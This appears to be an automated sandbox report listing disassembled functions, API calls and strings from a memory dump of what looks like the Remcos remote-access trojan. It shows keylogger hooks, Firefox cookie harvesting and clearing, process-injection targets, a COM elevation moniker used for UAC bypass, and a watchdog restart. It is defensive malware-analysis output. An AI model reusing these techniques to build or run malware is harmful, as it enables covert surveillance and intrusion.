                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                    • String ID: SystemDrive$cmd.exe
                                                                                                                                                    • API String ID: 2994406822-3633465311
                                                                                                                                                    • Opcode ID: d07cdffecf2d83aac8b64e8c8fc9ca70a56ddea336d6073bc1b8c9c33a9c4037
                                                                                                                                                    • Instruction ID: 45aaa79962702e7a92fa54b5bf27f04a9608b5ff8f286db8dbb646b2e261c639
                                                                                                                                                    • Opcode Fuzzy Hash: d07cdffecf2d83aac8b64e8c8fc9ca70a56ddea336d6073bc1b8c9c33a9c4037
                                                                                                                                                    • Instruction Fuzzy Hash: 5991C275B16368AFC700EF35CCB091E7AAEEB50218B40052EF98697290DE31BC44CBE5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156920F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 15692106
                                                                                                                                                      • Part of subcall function 15693877: RegCreateKeyA.ADVAPI32(80000001,00000000,156E60A4), ref: 15693885
                                                                                                                                                      • Part of subcall function 15693877: RegSetValueExA.ADVAPI32(156E60A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,1568C152,156E6C48,00000001,000000AF,156E60A4), ref: 156938A0
                                                                                                                                                      • Part of subcall function 15693877: RegCloseKey.ADVAPI32(156E60A4,?,?,?,1568C152,156E6C48,00000001,000000AF,156E60A4), ref: 156938AB
                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 15692146
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15692155
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,156927EE,00000000,00000000,00000000), ref: 156921AB
                                                                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 1569241A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                                                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                                                    • API String ID: 3018269243-13974260
                                                                                                                                                    • Opcode ID: e970a2b13adfcd1686a416165a36ae352e0b541c96d5438112ca04c0fc6ba9f4
                                                                                                                                                    • Instruction ID: fbce2bc6649d2bfc1b88718711c370d7274bdee7a065e26f9156f8687d9e8ad5
                                                                                                                                                    • Opcode Fuzzy Hash: e970a2b13adfcd1686a416165a36ae352e0b541c96d5438112ca04c0fc6ba9f4
                                                                                                                                                    • Instruction Fuzzy Hash: 1671937970A3019BD718EB74CC558BE77E9AF91210F400A2DF48697194EF34B909CBEA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE58CC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,02DE7338,02DE0000,02E0B790), ref: 02DE58E9
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02DE5900
                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,?), ref: 02DE5930
                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02DE7338,02DE0000,02E0B790), ref: 02DE5994
                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02DE7338,02DE0000,02E0B790), ref: 02DE59CA
                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02DE7338,02DE0000,02E0B790), ref: 02DE59DD
                                                                                                                                                    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DE7338,02DE0000,02E0B790), ref: 02DE59EF
                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DE7338,02DE0000,02E0B790), ref: 02DE59FB
                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DE7338,02DE0000), ref: 02DE5A2F
                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DE7338), ref: 02DE5A3B
                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02DE5A5D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                    • API String ID: 3245196872-1565342463
                                                                                                                                                    • Opcode ID: b115bd44e217673edf522eaec0e4bd0f337cf630d3c22a8adfffb5473bfffcab
                                                                                                                                                    • Instruction ID: 633f6768157c12ff63648cb882788f4df522b7cfa04198c8b51286ef517db151
                                                                                                                                                    • Opcode Fuzzy Hash: b115bd44e217673edf522eaec0e4bd0f337cf630d3c22a8adfffb5473bfffcab
                                                                                                                                                    • Instruction Fuzzy Hash: 0E414F72E00619ABDF10EAE8DC88ADEB7ADEF08398F4445A5A14AD7340D770DF448F64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 1568BDAF
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 1568BDC9
                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 1568BE89
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 1568BEAF
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 1568BED0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$Close$File$FirstNext
                                                                                                                                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                    • API String ID: 3527384056-432212279
                                                                                                                                                    • Opcode ID: 56e465f3a01e5402d9dcf0f8347d3953ccdff12fb731a40586dca4ecf506b182
                                                                                                                                                    • Instruction ID: 5974bc28205ffc2d6dbbb194fee471e5a6e54974ee9b5c5b74148bdd29a738d7
                                                                                                                                                    • Opcode Fuzzy Hash: 56e465f3a01e5402d9dcf0f8347d3953ccdff12fb731a40586dca4ecf506b182
                                                                                                                                                    • Instruction Fuzzy Hash: 64419135E12329AEDB14E7B4DC98CEEB779EF11210F400619E906A3590EF307A45CBE5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156932D2 Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 15693417
                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 15693425
                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 15693432
                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 15693452
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1569345F
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 15693465
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 297527592-0
                                                                                                                                                    • Opcode ID: ce77e430f725d56977271d68f44394684c3007d894a78185b10eab211fc568cc
                                                                                                                                                    • Instruction ID: a2e9d53f33687ec66a437a0a7979589f2818cf67ae6e0f7065270d96f59d13df
                                                                                                                                                    • Opcode Fuzzy Hash: ce77e430f725d56977271d68f44394684c3007d894a78185b10eab211fc568cc
                                                                                                                                                    • Instruction Fuzzy Hash: BD41CB31748245BFE7219B29DC89F1B7AADEF85724F100A19FA48D60A0DF74E900C7E6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,156F50E4,?,156F5338), ref: 1568F48E
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1568F4B9
                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 1568F4D5
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 1568F554
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,156F5338), ref: 1568F563
                                                                                                                                                      • Part of subcall function 1569C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 1569C1F5
                                                                                                                                                      • Part of subcall function 1569C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 1569C208
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,156F5338), ref: 1568F66E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                                                    • API String ID: 3756808967-1743721670
                                                                                                                                                    • Opcode ID: 0a50b4774f186962121b8b30dc6d71d6cdf771fe5f2b3b7b50d37fec1d723de2
                                                                                                                                                    • Instruction ID: 5beb5d3ae32a921162dda99cd41ee640ee1a5b02b8891b359fba0d647585ed98
                                                                                                                                                    • Opcode Fuzzy Hash: 0a50b4774f186962121b8b30dc6d71d6cdf771fe5f2b3b7b50d37fec1d723de2
                                                                                                                                                    • Instruction Fuzzy Hash: 4F714C7461A3419BC714DF20D8A0DAEB7E9BF95240F80092DF596432A0EF34B94DCBDA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15699627 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0$1$2$3$4$5$6$7
                                                                                                                                                    • API String ID: 0-3177665633
                                                                                                                                                    • Opcode ID: 0cf6f965b61210f83f0dad7356598c4680ac05aa912f0e8c040c0ecf77f2048c
                                                                                                                                                    • Instruction ID: 580b719c9b5fd68ad825a6b6f7b52dcc8081026a454747e9db232a57e71450cb
                                                                                                                                                    • Opcode Fuzzy Hash: 0cf6f965b61210f83f0dad7356598c4680ac05aa912f0e8c040c0ecf77f2048c
                                                                                                                                                    • Instruction Fuzzy Hash: E8719E7860A302AFD308CF20D890FAABBA4AF95610F44491DF592576D4EB74BB48C7D6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156874FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _wcslen.LIBCMT ref: 15687521
                                                                                                                                                    • CoGetObject.OLE32(?,00000024,156E6518,00000000), ref: 15687582
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object_wcslen
                                                                                                                                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                    • API String ID: 240030777-3166923314
                                                                                                                                                    • Opcode ID: e0a3ffd124604b9d04d0268ac4fbcf03b91781677fe593f46520b68889394343
                                                                                                                                                    • Instruction ID: f70d2308310d6bc964f86df04ed176dbb4f362d27d4cf0eb30a9f1c5dcfe6f2b
                                                                                                                                                    • Opcode Fuzzy Hash: e0a3ffd124604b9d04d0268ac4fbcf03b91781677fe593f46520b68889394343
                                                                                                                                                    • Instruction Fuzzy Hash: 0011C676A03218ABD720DA94EC58ADEB7BCEB04320F000155E814A3140EA75BE44C6F5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,156F58E8), ref: 1569A75E
                                                                                                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 1569A7AD
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1569A7BB
                                                                                                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 1569A7F3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3587775597-0
                                                                                                                                                    • Opcode ID: f4ae9ba91ef2044fcb7cda5f8be766d15014f82512f448825b8e030e9b913a1c
                                                                                                                                                    • Instruction ID: 8634af320181cbdad6a5ade96208094cb649e140fc3a6d5c5ccffc42a9992f3e
                                                                                                                                                    • Opcode Fuzzy Hash: f4ae9ba91ef2044fcb7cda5f8be766d15014f82512f448825b8e030e9b913a1c
                                                                                                                                                    • Instruction Fuzzy Hash: 1B81357520A304AFC714EB60D894DAFB7E9FF94214F50491EF58682260EF70BA09CBD6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE5B9C Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DE5BAC
                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02DE5BB9
                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02DE5BBF
                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02DE5BEA
                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DE5C31
                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DE5C41
                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DE5C69
                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DE5C79
                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02DE5C9F
                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02DE5CAF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                    • API String ID: 1599918012-2375825460
                                                                                                                                                    • Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                                                    • Instruction ID: 6ce056a6ca20ae6e9988e3e3fffe87fe284b4e0a7d090a34fd1409f35c43eb9d
                                                                                                                                                    • Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                                                    • Instruction Fuzzy Hash: 6D3164B1F4011D2AEF25E6B4DC46BDE77AD8B043C8F4445A1964AE6281DA74DE84CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 1568C39B
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 1568C46E
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 1568C47D
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 1568C4A8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$CloseFile$FirstNext
                                                                                                                                                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                    • API String ID: 1164774033-405221262
                                                                                                                                                    • Opcode ID: 3627a1a8b6e1f7b0ba90afc2005077c1b34e6975c02d16c43a616caa885144bb
                                                                                                                                                    • Instruction ID: 0e14cea9da926215b148fca221c9c5d0b49dbe347e1984d01bbb05174615caf0
                                                                                                                                                    • Opcode Fuzzy Hash: 3627a1a8b6e1f7b0ba90afc2005077c1b34e6975c02d16c43a616caa885144bb
                                                                                                                                                    • Instruction Fuzzy Hash: D7318135A163199ADB14E7B0DC94DFDB7B9AF10611F000219E406A6194FF34BA8ACBD8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568A2B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 1568A2D3
                                                                                                                                                    • SetWindowsHookExA.USER32(0000000D,1568A2A4,00000000), ref: 1568A2E1
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1568A2ED
                                                                                                                                                      • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1568A33B
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 1568A34A
                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 1568A355
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                    • String ID: Keylogger initialization failure: error $`Wu
                                                                                                                                                    • API String ID: 3219506041-303027793
                                                                                                                                                    • Opcode ID: 73ac6fbc1447ed803193523e9425e8109726e2b33c57f01cf561e217cfae1621
                                                                                                                                                    • Instruction ID: 294135d78019219b500e7c2988ed090711bff06634d8978b695eec12286401fe
                                                                                                                                                    • Opcode Fuzzy Hash: 73ac6fbc1447ed803193523e9425e8109726e2b33c57f01cf561e217cfae1621
                                                                                                                                                    • Instruction Fuzzy Hash: C9119E71A25355ABC710AF759C4986F77EDEB95631B404A2DFCC6C2580EF70A500CBE2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,156F4EE0,?), ref: 1569C2EC
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,156F4EE0,?), ref: 1569C31C
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,156F4EE0,?), ref: 1569C38E
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,156F4EE0,?), ref: 1569C39B
                                                                                                                                                      • Part of subcall function 1569C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,156F4EE0,?), ref: 1569C371
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,156F4EE0,?), ref: 1569C3BC
                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,156F4EE0,?), ref: 1569C3D2
                                                                                                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,156F4EE0,?), ref: 1569C3D9
                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,156F4EE0,?), ref: 1569C3E2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
